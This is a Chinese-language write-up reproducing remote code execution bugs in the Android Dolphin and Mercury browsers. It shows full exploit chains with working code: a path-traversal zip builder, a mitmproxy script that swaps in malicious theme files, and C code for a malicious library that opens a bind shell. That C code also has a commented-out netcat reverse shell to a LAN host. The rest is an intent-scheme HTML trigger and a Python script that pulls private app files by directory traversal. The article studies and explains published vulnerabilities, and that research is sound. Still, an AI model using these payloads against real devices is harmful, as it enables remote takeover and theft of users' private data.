# 海豚浏览器与水星浏览器远程代码执行漏洞详解
0x00 简介
=======
* * *
最近国外安全研究人员rotlogix连续曝光了安卓版海豚浏览器(dolphin browser)和水星浏览器(mercury browser)的安全漏洞[1,2],尽管这两个浏览器在国内并不流行,但其中的远程攻击手法和一系列漏洞组合的利用颇值得玩味,于是对这两个漏洞进行了复现和学习,分享与大家共同进步。
0x01 海豚浏览器远程代码执行漏洞
==================
* * *
该漏洞可以看作前段时间三星自带Swift输入法远程代码漏洞的延伸,不同之处在于通过中间人攻击patch了so文件,在so文件中的JNI_OnLoad函数中添加恶意代码,当so被加载后有机会实现远程代码执行。此次测试的海豚浏览器版本为V11.4.17。
1. 漏洞原理
-------
海豚浏览器允许用户选择并应用主题来改变浏览器的外观,当用户选择新主题下载时,主题文件会被下载
```
GET https://opsen-static.dolphin-browser.com/resources/themestore/Alonso_P.dwp
```
主题文件实际是一个zip文件,对其重命名后查看内容如下:
由于海豚浏览器并未对解压的文件进行验证,且安卓系统zip库的默认行为是允许解压文件到所在目录之外,因此通过中间人攻击,修改HTTP请求返回主题文件zip包中的内容,可以实现在海豚浏览器拥有权限的目录写文件。
注意到我们测试的版本与原文有所不同,下载主题文件的链接是https,但其SSL也没有正确实现,因此依然也能通过中间人攻击成功。
2. 漏洞利用——在私有目录写文件
-----------------
漏洞利用需要通过中间人攻击,将手机的流量透明代理到运行mitmproxy的服务器上。首先,利用python制作一个修改后的主题文件,即将同目录下名为1的文件添加到主题文件zip包中,且文件名为`../../../../../../data/data/mobi.mgeek.TunnyBrowser/files/this_should_not_exsist`
```
import zipfile
zf = zipfile.ZipFile("Alonso_P.dwp", "a")
zf.write("1", "../../../../../../data/data/mobi.mgeek.TunnyBrowser/files/this_should_not_exsist")
zf.close()
```
修改后的主题文件如下
接下来,编写一段mitmproxy的inline script inject_evilso.py,将下载返回的主题文件替换成我们修改后的主题文件。
```
from libmproxy.protocol.http import HTTPResponse
from netlib.odict import ODictCaseless
def request(context, flow):
if not flow.request.host =="opsen-static.dolphin-browser.com" or not flow.request.path.endswith(".dwp"):
return
# Build response
response = HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "application/zip"]]), "yo!") # Inject theme
# Inject theme
try:
with open("Alonso_P.dwp", "r") as f:
modified = f.read()
response.content = modified
response.headers["Content-Length"] = [len(modified)]
f.close()
except IOError as e:
raise e
# Return response
#
flow.reply(response)
```
使用mitmdump运行脚本
```
mitmdump -s inject_evilso.py
```
在手机上使用海豚浏览器,下载并应用主题。观察到mitmdump的输出
```
192.168.8.155 GET https://opsen-static.dolphin-browser.com/resources/themestore/Grassy.dwp
<< 200 OK 210.39kB
```
此时查看海豚浏览器私有目录,压缩包中放置的恶意文件已经写入成功。
3. 漏洞利用——patch so实现代码执行
-----------------------
要将任意文件写升级为代码执行,可以考虑对海豚浏览器二次加载的库进行patch,与Swift输入法漏洞利用过程中patch odex文件所不同,这里选择的是patch上述目录下的libdolphin.so。
首先用ndk编译一个恶意的libdolphin.so
```
#include <stdio.h>
#include <jni.h>
#include <stdlib.h>
#include <unistd.h>
#include <android/log.h>
#define LOG "heen"
#define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG,__VA_ARGS__)
jint JNICALL JNI_OnLoad(JavaVM* vm, void* reserved)
{
JNIEnv* env = NULL;
jint result = -1;
int ret;
if ((*vm)->GetEnv(vm, (void**) &env, JNI_VERSION_1_4) != JNI_OK) {
return -1;
}
/* success -- return valid version number */
result = JNI_VERSION_1_4;
LOGI("Hello, World");
//ret = system("nc 192.168.8.163 8088|/system/bin/sh|nc 192.168.8.163 9999");
ret = system("nc -ll -p 6666 -e /system/bin/sh");
LOGI("ret value of system is %d",ret);
// sleep(1800);
return result;
}
```
然后按照前面的方法将编译的so文件添加到主题文件压缩包中,
手机上重新下载主题文件并应用,这将触发mitmdump脚本替换下载返回的主题文件为添加恶意so的主题文件。此时我们结束海豚浏览器,并重新打开,使其有机会加载我们改写的so。logcat将有如下输出,
```
D/dalvikvm(25522): Trying to load lib /data/data/mobi.mgeek.TunnyBrowser/files/libdolphin.so 0x42687bc0
D/dalvikvm(25522): Added shared lib /data/data/mobi.mgeek.TunnyBrowser/files/libdolphin.so 0x42687bc0
```
而海豚浏览器也并未崩溃,可以正常浏览网页。用nc连接,patch的恶意代码已经生效
0x02 水星浏览器远程代码执行漏洞
==================
* * *
漏洞首先在于水星浏览器没有正确过滤Intent URI Scheme,这导致恶意网页可以利用Intent Scheme调用私有组件启动水星浏览器实现的web server。而该webserver又对文件名路径校验不严格,导致可通过目录穿越来获取浏览器私有目录下文件或sdcard下的任意文件。测试版本为v3.2.3。
1. Intent Scheme未正确过滤
---------------------
在com.ilegendsoft.mercury.ui.widget.webview.g类中有如下代码
intent对象在传入startActivity方法前并没有按如下方式进行过滤
```
// forbid launching activities without BROWSABLE category
intent.addCategory("android.intent.category.BROWSABLE");
// forbid explicit call
intent.setComponent(null);
// forbid intent with selector intent
intent.setSelector(null);
```
因此可以通过网页嵌入如下形式的脚本启动任意activity,包括私有activity。
```
<script>location.href="intent:#Intent;action=android.intent.action.VIEW;component=包名/组件名";</script>
```
2. 寻找攻击对象
---------
这种情况一般是寻找私有未导出的activity作为攻击对象。经过逆向分析,可发现未导出activity——com.ilegendsoft.mercury.external.wfm.ui.WFMActivity2被启动时,可打开手机与电脑之间的WiFi文件传输功能。
见WFMActivity2的OnResume方法,
```
protected void onResume() {
super.onResume();
this.mWfmFragment.onServAvailable();
}
```
调用其成员变量mWfmFragment对象的onServAvailable方法,位于`com.ilegendsoft.mercury.external.wfm.ui.WFMActivity2.WFMFragment`
```
public void onServAvailable() {
if(this.needResumeServer) {
this.doStartClick();
}
```
调用doStartClick方法
```
private void doStartClick() {
this.ipAddr = this.mCommonUtil.getLocalIpAddress(true);
if(this.ipAddr == null || !this.isWebServAvailable()) {
this.mStep2Tv.setText("");
d.c(this.getString(2131165689));
}
else {
this.updateOnUI(this.ipAddr);
this.doBindService();
this.needResumeServer = false;
}
}
```
见关键的doBindService方法,其实现位于WFMFragement的父类 AbsWFMFragment
```
protected void doBindService() {
this.getActivity().bindService(this.webServIntent, this.servConnection, 1);
this.isBound = true;
}
```
再看OnCreate方法
```
public void onCreate(Bundle arg4) {
super.onCreate(arg4);
this.webServIntent = new Intent(this.getActivity(), WebService.class);
}
```
至此,可知WFMActivity2被启动时,同时将启动一个与其绑定的一个WebService,该Service在OnBind方法中打开一个WebServer。
```
public IBinder onBind(Intent arg2) {
this.openWebServer();
return this.mBinder;
}
```
该WebServer注册了一些特定的URI路径,实现了下载dodownload、删除dodelete、上传doupload等命令。
3. 攻击私有组件WFMActivity2
---------------------
首先编写恶意网页启动WFMActivity2
```
<html>
<head>
<meta charset="utf-8" />
<title>Trigger parseUri()</title>
</head>
<body>
<script>
location.href="intent:#Intent;SEL;component=com.ilegendsoft.mercury/.external.wfm.ui.WFMActivity2;action=android.intent.action.VIEW;end";
</script>
</body>
</html>
```
然后用水星浏览器访问该恶意网页,出现如下界面
此时PC端已经能够访问webserver,并具有对手机中sdcard文件上传、下载和删除功能。
4. 目录穿越漏洞
---------
默认情况下只能下载访问sdcard目录,但进一步的漏洞挖掘发现WFMActivity2打开的WebServer还具有目录穿越漏洞,可以通过dodownload和doupload命令以访问../../[程序私有目录] 的形式下载或上传私有目录的文件。
根据HTTPDownHandler中的处理代码,
需要正确设置HTTP请求中的Referer才能进入成功的下载处理分支。
对程序配置文件私有目录打包下载使用doupload命令类似,可以实现上传文件到程序私有目录。
#### 5. 漏洞利用总结
至此,一系列漏洞利用组合可归纳如下:
(1) 通过恶意网页的Intent URI Scheme启动WFMActivity2
(2) 记录使用水星浏览器目标用户的IP地址
(3) 轮询WFMActivity2是否被启动
(4) 利用目录穿越漏洞下载水星浏览器的私有目录文件
附攻击脚本(使用lighttpd)
```
import os,re,requests
def poll():
keyword = 'evil.html'
while True:
with open("/usr/local/var/log/lighttpd/access.log", 'r') as f:
print 'Polling...\n'
for line in f.readlines():
if re.search(keyword, line):
target = line.split()[0]
headers = {'Referer': 'http://%s:8888/'%target}
url = 'http://%s:8888/dodownload'%target
payload = {'fname': '../../../../data/data/com.ilegendsoft.mercury/shared_prefs/com.ilegendsoft.mercury_preferences.xml'}
try:
r = requests.get(url, params = payload, headers = headers)
print 'Exploiting...\n'
print r.status_code, r.content
return
except Exception as e:
continue
else:
continue
if __name__ == '__main__':
poll()
```
攻击效果
0x03 参考
=======
* * *
```
[1] http://rotlogix.com/2015/08/22/remote-code-execution-in-dolphin-browser-for-android/
[2] http://rotlogix.com/2015/08/23/exploiting-the-mercury-browser-for-android/
```